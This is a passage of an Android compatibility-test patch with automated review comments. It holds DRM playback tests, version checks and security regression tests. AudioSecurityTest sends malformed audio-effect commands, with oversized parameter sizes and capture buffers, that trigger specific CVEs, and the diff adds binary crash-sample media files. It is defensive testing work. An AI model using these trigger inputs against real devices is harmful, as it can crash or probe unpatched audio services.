+ assertTrue(isCryptoSchemeSupportedNative(uuidByteArray(CLEARKEY_SCHEME_UUID)));
+ }
+
+ public void testIsCryptoSchemeNotSupported() throws Exception {
+ assertFalse(isCryptoSchemeSupportedNative(uuidByteArray(BAD_SCHEME_UUID)));
+ }
+
+ public void testPssh() throws Exception {
+ assertTrue(testPsshNative(uuidByteArray(CLEARKEY_SCHEME_UUID),
+ CENC_CLEARKEY_VIDEO_URL.toString()));
+ }
+
+ public void testGetPropertyString() throws Exception {
+ StringBuffer value = new StringBuffer();
+ testGetPropertyStringNative(uuidByteArray(CLEARKEY_SCHEME_UUID), "description", value);
+ assertEquals("ClearKey CDM", value.toString());
+ }
+
+ public void testUnknownPropertyString() throws Exception {
+ try {
+ StringBuffer value = new StringBuffer();
+ testGetPropertyStringNative(uuidByteArray(CLEARKEY_SCHEME_UUID),
+ "unknown-property", value);
+ } catch (RuntimeException e) {
+ Log.e(TAG, "testUnknownPropertyString error = '" + e.getMessage() + "'");
+ assertThat(e.getMessage(), containsString("get property string returns"));
+ }
+ }
+
+ /**
+ * Tests native clear key system playback.
+ */
+ private void testClearKeyPlayback(
+ String mimeType, /*String initDataType,*/ Uri audioUrl, Uri videoUrl,
+ int videoWidth, int videoHeight) throws Exception {
+
+ if (!isCryptoSchemeSupportedNative(uuidByteArray(CLEARKEY_SCHEME_UUID))) {
+ throw new Error("Crypto scheme is not supported.");
+ }
+
+ IConnectionStatus connectionStatus = new ConnectionStatus(mContext);
+ if (!connectionStatus.isAvailable()) {
+ throw new Error("Network is not available, reason: " +
+ connectionStatus.getNotConnectedReason());
+ }
+
+ // If device is not online, recheck the status a few times.
+ int retries = 0;
+ while (!connectionStatus.isConnected()) {
+ if (retries++ >= CONNECTION_RETRIES) {
+ throw new Error("Device is not online, reason: " +
+ connectionStatus.getNotConnectedReason());
+ }
+ try {
+ Thread.sleep(100);
+ } catch (InterruptedException e) {
+ // do nothing
+ }
+ }
+ connectionStatus.testConnection(videoUrl);
+
+ if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.getPath())) {
+ Log.i(TAG, "Device does not support " +
+ videoWidth + "x" + videoHeight + " resolution for " + mimeType);
+ return; // skip
+ }
+
+ // set to true if modify isVersionSmaller()
+ if (false)
+ unitTestIsVersionSmaller();
+
+ // This test requires two changes in frameworks/av (go/av/1628977 and
+ // go/ag/1598174) that are in 7.1.2 and above.
+ // Version 8 and above does not need this check.
+ if (isVersionSmaller(android.os.Build.VERSION.RELEASE, "7.1.2")) {
+ Log.i(TAG, "This test requires android \"7.1.2\" or higher.");
+ Log.i(TAG, "This device is running \"" +
+ android.os.Build.VERSION.RELEASE + "\".");
+ return; // skip
+ }
+ PlaybackParams params = new PlaybackParams();
+ params.surface = mActivity.getSurfaceHolder().getSurface();
+ params.mimeType = mimeType;
+ params.audioUrl = audioUrl.toString();
+ params.videoUrl = videoUrl.toString();
+
+ if (!testClearKeyPlaybackNative(
+ uuidByteArray(CLEARKEY_SCHEME_UUID), params)) {
+ Log.e(TAG, "Fails play back using native media drm APIs.");
+ }
+ params.surface.release();
+ }
+
+ private void unitTestIsVersionSmaller() {
+ assertTrue(isVersionSmaller("6.9", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1.4", "7.1.2"));
+ assertFalse(isVersionSmaller("7.1.2", "7.1.2"));
+ assertFalse(isVersionSmaller("8.0", "7.1.2"));
+ assertFalse(isVersionSmaller("8.1.2", "7.1.2"));
+ }
+
+ private ArrayList<Integer> intVersion(String version) {
+ String versions[] = version.split("\\.");
+
+ ArrayList<Integer> versionNumbers = Lists.newArrayList();
+ for (String subVersion : versions) {
+ versionNumbers.add(Integer.parseInt(subVersion));
+ }
+ return versionNumbers;
+ }
+
+ /**
+ * Return true if smaller, return false if great than or equal to the
+ * target version.
+ */
+ private boolean isVersionSmaller(String testVersion, String targetVersion) {
+ ArrayList<Integer> intTestVersion = intVersion(testVersion);
+ ArrayList<Integer> intTargetVersion = intVersion(targetVersion);
+
+ Iterator itr = intTestVersion.iterator();
+ for (int targetNumber : intTargetVersion) {
+ if (itr.hasNext()) {
+ int testNumber = (int) itr.next();
+ if (testNumber == targetNumber) {
+ continue;
+ } else {
+ return testNumber < targetNumber;
+ }
+ } else {
+ // treat test version as 0
+ return 0 != targetNumber;
+ }
+ }
+ return false;
+ }
+
+ private static native boolean isCryptoSchemeSupportedNative(final byte[] uuid);
+
+ private static native boolean testClearKeyPlaybackNative(final byte[] uuid,
+ PlaybackParams params);
+
+ private static native boolean testGetPropertyStringNative(final byte[] uuid,
+ final String name, StringBuffer value);
+
+ private static native boolean testPsshNative(final byte[] uuid, final String videoUrl);
+
+ public void testClearKeyPlaybackCenc() throws Exception {
+ testClearKeyPlayback(
+ ISO_BMFF_VIDEO_MIME_TYPE,
+ CENC_AUDIO_URL,
+ CENC_CLEARKEY_VIDEO_URL,
+ VIDEO_WIDTH_CENC, VIDEO_HEIGHT_CENC);
+ }
+}
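Review bot: In `testClearKeyPlayback`, a `false` return from `testClearKeyPlaybackNative` is only logged with `Log.e`, so `testClearKeyPlaybackCenc` still passes when native playback fails without throwing. The native code shown earlier in this diff returns `JNI_FALSE` with only an `ALOGE` on a key-request size or data mismatch. Capture the result, release the surface, then assert it: `boolean played = testClearKeyPlaybackNative(uuidByteArray(CLEARKEY_SCHEME_UUID), params);`, `params.surface.release();`, `assertTrue("native ClearKey playback failed", played);`. `testUnknownPropertyString` has the same weakness: its only assertion sits inside the `catch`, so it passes when no exception is thrown, and a `fail("expected RuntimeException")` after the native call would close that gap if the exception is the intended outcome. Both content URLs are `http://`, so the test media is fetched without transport integrity; an `https://` source would be preferable if the host serves one.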
diff --git a/tests/tests/os/Android.mk b/tests/tests/os/Android.mk
index 3b55e87b..0ee48ff 100644
--- a/tests/tests/os/Android.mk
+++ b/tests/tests/os/Android.mk
@@ -51,3 +51,34 @@
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
+
+# platform version check (b/32056228)
+# ============================================================
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := cts-platform-version-check
+LOCAL_MODULE_CLASS := ETC
+LOCAL_MODULE_TAGS := optional
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+
+cts_platform_version_path := cts/tests/tests/os/assets/platform_versions.txt
+cts_platform_version_string := $(shell cat $(cts_platform_version_path))
+
+include $(BUILD_SYSTEM)/base_rules.mk
+
+$(LOCAL_BUILT_MODULE) : $(cts_platform_version_path) build/core/version_defaults.mk
+ $(hide) if [ -z "$(findstring $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then \
+ echo "============================================================" 1>&2; \
+ echo "Could not find version \"$(PLATFORM_VERSION)\" in CTS platform version file:" 1>&2; \
+ echo "" 1>&2; \
+ echo " $(cts_platform_version_path)" 1>&2; \
+ echo "" 1>&2; \
+ echo "Most likely PLATFORM_VERSION in build/core/version_defaults.mk" 1>&2; \
+ echo "has changed and a new version must be added to this CTS file." 1>&2; \
+ echo "============================================================" 1>&2; \
+ exit 1; \
+ fi
+ @mkdir -p $(dir $@)
+ echo $(cts_platform_version_string) > $@
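Review bot: The version check in the `$(LOCAL_BUILT_MODULE)` recipe uses `$(findstring ...)`, which is a substring match, so any `PLATFORM_VERSION` that is a fragment of a listed version is accepted. For example, `7.1` would still pass with only `7.1.1` in the file. `$(filter ...)` compares whole whitespace-separated words and keeps the allow-list exact: `$(hide) if [ -z "$(filter $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then \`. A one-line comment above `cts_platform_version_string` noting that `$(shell cat ...)` flattens the file into a space-separated list would explain why the word-wise match works.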
diff --git a/tests/tests/os/assets/platform_versions.txt b/tests/tests/os/assets/platform_versions.txt
new file mode 100644
index 0000000..6f9c237
--- /dev/null
+++ b/tests/tests/os/assets/platform_versions.txt
@@ -0,0 +1,3 @@
+7.1
+7.1.1
+7.1.2
diff --git a/tests/tests/os/src/android/os/cts/BuildVersionTest.java b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
index 66066e9..d06171b 100644
--- a/tests/tests/os/src/android/os/cts/BuildVersionTest.java
+++ b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
@@ -16,10 +16,16 @@
package android.os.cts;
+import android.content.res.AssetManager;
import android.os.Build;
import android.platform.test.annotations.RestrictedBuildTest;
+import android.support.test.InstrumentationRegistry;
import android.util.Log;
+import java.io.BufferedReader;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
@@ -29,17 +35,16 @@
public class BuildVersionTest extends TestCase {
private static final String LOG_TAG = "BuildVersionTest";
- private static final Set<String> EXPECTED_RELEASES =
- new HashSet<String>(Arrays.asList("7.1","7.1.1"));
private static final int EXPECTED_SDK = 25;
private static final String EXPECTED_BUILD_VARIANT = "user";
private static final String EXPECTED_TAG = "release-keys";
+ private static final String PLATFORM_VERSIONS_FILE = "platform_versions.txt";
@SuppressWarnings("deprecation")
@RestrictedBuildTest
public void testReleaseVersion() {
// Applications may rely on the exact release version
- assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, EXPECTED_RELEASES);
+ assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, getExpectedReleases());
assertEquals("Build.VERSION.SDK", "" + EXPECTED_SDK, Build.VERSION.SDK);
assertEquals("Build.VERSION.SDK_INT", EXPECTED_SDK, Build.VERSION.SDK_INT);
}
@@ -94,4 +99,20 @@
", should be one of: " + permittedValues);
}
}
+
+ private Set<String> getExpectedReleases() {
+ Set<String> expectedReleases = new HashSet<String>();
+ final AssetManager assets =
+ InstrumentationRegistry.getInstrumentation().getTargetContext().getAssets();
+ String line;
+ try (BufferedReader br =
+ new BufferedReader(new InputStreamReader(assets.open(PLATFORM_VERSIONS_FILE)))) {
+ while ((line = br.readLine()) != null) {
+ expectedReleases.add(line);
+ }
+ } catch (IOException e) {
+ fail("Could not open file " + PLATFORM_VERSIONS_FILE + " to run test");
+ }
+ return expectedReleases;
+ }
}
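Review bot: `getExpectedReleases` adds every line of `platform_versions.txt` verbatim, so a trailing blank line puts the empty string into the permitted set and stray whitespace around a version changes the stored value. Normalising each line keeps the allow-list exact: `line = line.trim();` followed by `if (!line.isEmpty()) expectedReleases.add(line);`. The `catch` also drops the `IOException`, so the `fail(...)` message loses the cause; appending `+ ": " + e` would keep it. The `java.io.InputStream` import added in the first hunk of this file is not used by the new code shown here.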
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index 4531aa6..68609e1 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
private static final int SECURITY_PATCH_YEAR = 2016;
- private static final int SECURITY_PATCH_MONTH = 12;
+ private static final int SECURITY_PATCH_MONTH = 06;
private boolean mSkipTests = false;
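Review bot: `SECURITY_PATCH_MONTH = 06` is an octal literal in Java; it happens to equal 6, but `08` or `09` written the same way would not compile, so the value should be written as `6`. Separately, this moves the minimum accepted patch level back from 2016-12 to 2016-06. Going by the `SECURITY_PATCH_DATE_ERROR` text, that lets a device six months further behind on security patches pass the check. If the lower value arrived through the branch merge rather than by intent, the constant should stay at `12`.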
diff --git a/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java b/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
index 7df2f97..529b176 100644
--- a/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
+++ b/tests/tests/provider/src/android/provider/cts/MediaStoreIntentsTest.java
@@ -17,7 +17,6 @@
package android.provider.cts;
import android.content.Intent;
-import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.net.Uri;
import android.provider.MediaStore;
@@ -69,9 +68,6 @@
}
public void testViewImageFile() {
- if (getContext().getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
- return;
- }
final String[] schemes = new String[] {
"file", "http", "https", "content" };
final String[] mimes = new String[] {
diff --git a/tests/tests/security/Android.mk b/tests/tests/security/Android.mk
index 299be2e..a0ed953 100644
--- a/tests/tests/security/Android.mk
+++ b/tests/tests/security/Android.mk
@@ -32,33 +32,13 @@
LOCAL_JAVA_LIBRARIES := android.test.runner org.apache.http.legacy
LOCAL_JNI_SHARED_LIBRARIES := libctssecurity_jni libcts_jni libnativehelper_compat_libc++ \
- libnativehelper \
- libbinder \
- libutils \
- libmedia \
- libselinux \
- libcutils \
- libcrypto \
- libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
- libpcre2 \
- libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+ libnativehelper \
+ libcutils \
+ libcrypto \
+ libselinux \
+ libc++ \
+ libpcre2 \
+ libpackagelistparser
LOCAL_SRC_FILES := $(call all-java-files-under, src)\
src/android/security/cts/activity/ISecureRandomService.aidl\
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 7468d68..7b87851 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -25,6 +25,7 @@
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
<application>
<uses-library android:name="android.test.runner" />
diff --git a/tests/tests/security/jni/Android.mk b/tests/tests/security/jni/Android.mk
index 22420f8..5b8b49e 100644
--- a/tests/tests/security/jni/Android.mk
+++ b/tests/tests/security/jni/Android.mk
@@ -31,37 +31,16 @@
android_security_cts_MMapExecutableTest.cpp \
android_security_cts_EncryptionTest.cpp \
-LOCAL_C_INCLUDES := $(JNI_H_INCLUDE) \
- $(TOP)/frameworks/native/include/media/openmax
-
-LOCAL_SHARED_LIBRARIES := libnativehelper \
+LOCAL_SHARED_LIBRARIES := \
+ libnativehelper \
liblog \
- libutils \
- libmedia \
- libselinux \
- libdl \
libcutils \
libcrypto \
+ libselinux \
libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
libpcre2 \
libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+
LOCAL_C_INCLUDES += ndk/sources/cpufeatures
LOCAL_STATIC_LIBRARIES := cpufeatures
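Review bot: The rewritten `LOCAL_SHARED_LIBRARIES` list ends with `libpackagelistparser \` and relies on the blank line that follows to terminate the continuation. If that blank line is ever removed, `LOCAL_C_INCLUDES += ndk/sources/cpufeatures` is folded into the library list. Ending the list with `libpackagelistparser` and no trailing backslash removes that dependency on whitespace.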
diff --git a/tests/tests/security/res/raw/bug_31647370.ogg b/tests/tests/security/res/raw/bug_31647370.ogg
new file mode 100644
index 0000000..31f602a
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_31647370.ogg
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32322258.mp4 b/tests/tests/security/res/raw/bug_32322258.mp4
new file mode 100644
index 0000000..6fcab5e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32322258.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32577290.mp3 b/tests/tests/security/res/raw/bug_32577290.mp3
new file mode 100644
index 0000000..1098bb0
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32577290.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32873375.mp4 b/tests/tests/security/res/raw/bug_32873375.mp4
new file mode 100644
index 0000000..71e9c7b
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32873375.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32915871.mp4 b/tests/tests/security/res/raw/bug_32915871.mp4
new file mode 100644
index 0000000..9e50aaa
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32915871.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33137046.mp4 b/tests/tests/security/res/raw/bug_33137046.mp4
new file mode 100644
index 0000000..01f49b2
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33137046.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33300701.tiff b/tests/tests/security/res/raw/bug_33300701.tiff
new file mode 100644
index 0000000..ea7a477
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33300701.tiff
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3 b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
new file mode 100644
index 0000000..0232e70
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/onekhzsine_90sec.mp3 b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
new file mode 100644
index 0000000..3049011
--- /dev/null
+++ b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
new file mode 100644
index 0000000..0d453da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -0,0 +1,409 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import android.cts.util.CtsAndroidTestCase;
+import android.media.AudioFormat;
+import android.media.AudioManager;
+import android.media.AudioTrack;
+import android.media.audiofx.AudioEffect;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.Arrays;
+import java.util.UUID;
+
+public class AudioSecurityTest extends CtsAndroidTestCase {
+ private static final String TAG = "AudioSecurityTest";
+
+ private static final int ERROR_DEAD_OBJECT = -7; // AudioEffect.ERROR_DEAD_OBJECT
+
+ // should match audio_effect.h (native)
+ private static final int EFFECT_CMD_SET_PARAM = 5;
+ private static final int EFFECT_CMD_GET_PARAM = 8;
+ private static final int EFFECT_CMD_OFFLOAD = 20;
+ private static final int SIZEOF_EFFECT_PARAM_T = 12;
+
+ private static void verifyZeroReply(byte[] reply) throws Exception {
+ int count = 0;
+ for (byte b : reply) {
+ if (b != 0) {
+ count++;
+ }
+ }
+ assertEquals("reply has " + count + " nonzero values", 0 /* expected */, count);
+ }
+
+ // @FunctionalInterface
+ private interface TestEffect {
+ void test(AudioEffect audioEffect) throws Exception;
+ }
+
+ private static void testAllEffects(String testName, TestEffect testEffect) throws Exception {
+ int failures = 0;
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ final AudioEffect audioEffect;
+ try {
+ audioEffect = (AudioEffect)AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type,
+ descriptor.uuid, // uuid overrides type
+ 0 /* priority */, 0 /* audioSession */);
+ } catch (Exception e) {
+ Log.w(TAG, "effect " + testName + " " + descriptor.name
+ + " cannot be created (ignoring)");
+ continue; // OK;
+ }
+ try {
+ testEffect.test(audioEffect);
+ Log.d(TAG, "effect " + testName + " " + descriptor.name + " success");
+ } catch (Exception e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ } catch (AssertionError e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ }
+ }
+ assertEquals("found " + testName + " " + failures + " failures",
+ 0 /* expected */, failures);
+ }
+
+ // b/28173666
+ public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
+ testAllEffects("get parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/32438594
+ // b/32624850
+ // b/32635664
+ public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
+ testAllEffects("get parameter2 attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter2(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/30204301
+ public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
+ testAllEffects("set parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectSetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ private static void testAudioEffectGetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with invalid psize
+ {
+ byte command[] = new byte[30];
+ Arrays.fill(command, (byte)0xDD);
+ byte reply[] = new byte[30];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ verifyZeroReply(reply);
+ }
+
+ // NOTE: an alternative way of checking crash:
+ //
+ // Thread.sleep(1000 /* millis */);
+ // assertTrue("Audio server might have crashed",
+ // audioEffect.setEnabled(false) != AudioEffect.ERROR_DEAD_OBJECT);
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter2(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with small command size but large psize
+ {
+ final int parameterSize = 0x100000;
+
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(parameterSize) // psize (very large)
+ .putInt(0) // vsize
+ .putInt(0x04030201) // data[0] (param too small for psize)
+ .putInt(0x08070605) // data[4]
+ .array();
+ byte reply[] = new byte[parameterSize + SIZEOF_EFFECT_PARAM_T];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ verifyZeroReply(reply);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter3(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) get parameter with zero command size
+ {
+ final int parameterSize = 0x10;
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_GET_PARAM,
+ new byte[0] /* command */,
+ new byte[parameterSize + SIZEOF_EFFECT_PARAM_T] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) set parameter with invalid psize
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(0xdddddddd) // psize (very large)
+ .putInt(4) // vsize
+ .putInt(1) // data[0] (param too small for psize)
+ .putInt(0) // data[4]
+ .array();
+ byte reply[] = new byte[4]; // returns status code (ignored)
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_SET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ // on failure reply may contain the status code.
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetOffload(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled with zero command and reply size
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_OFFLOAD,
+ new byte[0] /* command */,
+ new byte[0] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ // should match effect_visualizer.h (native)
+ private static final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ private static final int VISUALIZER_CMD_CAPTURE = 0x10000;
+ private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
+
+ // b/31781965
+ public void testVisualizerCapture_CVE_2017_0396() throws Exception {
+ // Capture params
+ final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
+ final byte[] captureBuf = new byte[CAPTURE_SIZE];
+
+ // Track params
+ final int sampleRate = 48000;
+ final int format = AudioFormat.ENCODING_PCM_16BIT;
+ final int loops = 1;
+ final int seconds = 1;
+ final int channelCount = 2;
+ final int bufferFrames = seconds * sampleRate;
+ final int bufferSamples = bufferFrames * channelCount;
+ final int bufferSize = bufferSamples * 2; // bytes per sample for 16 bits
+ final short data[] = new short[bufferSamples]; // zero data
+
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) != 0) {
+ continue;
+ }
+
+ AudioEffect audioEffect = null;
+ AudioTrack audioTrack = null;
+
+ try {
+ // create track and play
+ {
+ audioTrack = new AudioTrack(AudioManager.STREAM_MUSIC, sampleRate,
+ AudioFormat.CHANNEL_OUT_STEREO, format, bufferSize,
+ AudioTrack.MODE_STATIC);
+ assertEquals("Cannot write to audio track",
+ bufferSamples,
+ audioTrack.write(data, 0 /* offsetInBytes */, data.length));
+ assertEquals("AudioTrack not initialized",
+ AudioTrack.STATE_INITIALIZED,
+ audioTrack.getState());
+ assertEquals("Cannot set loop points",
+ android.media.AudioTrack.SUCCESS,
+ audioTrack.setLoopPoints(0 /* startInFrames */, bufferFrames, loops));
+ audioTrack.play();
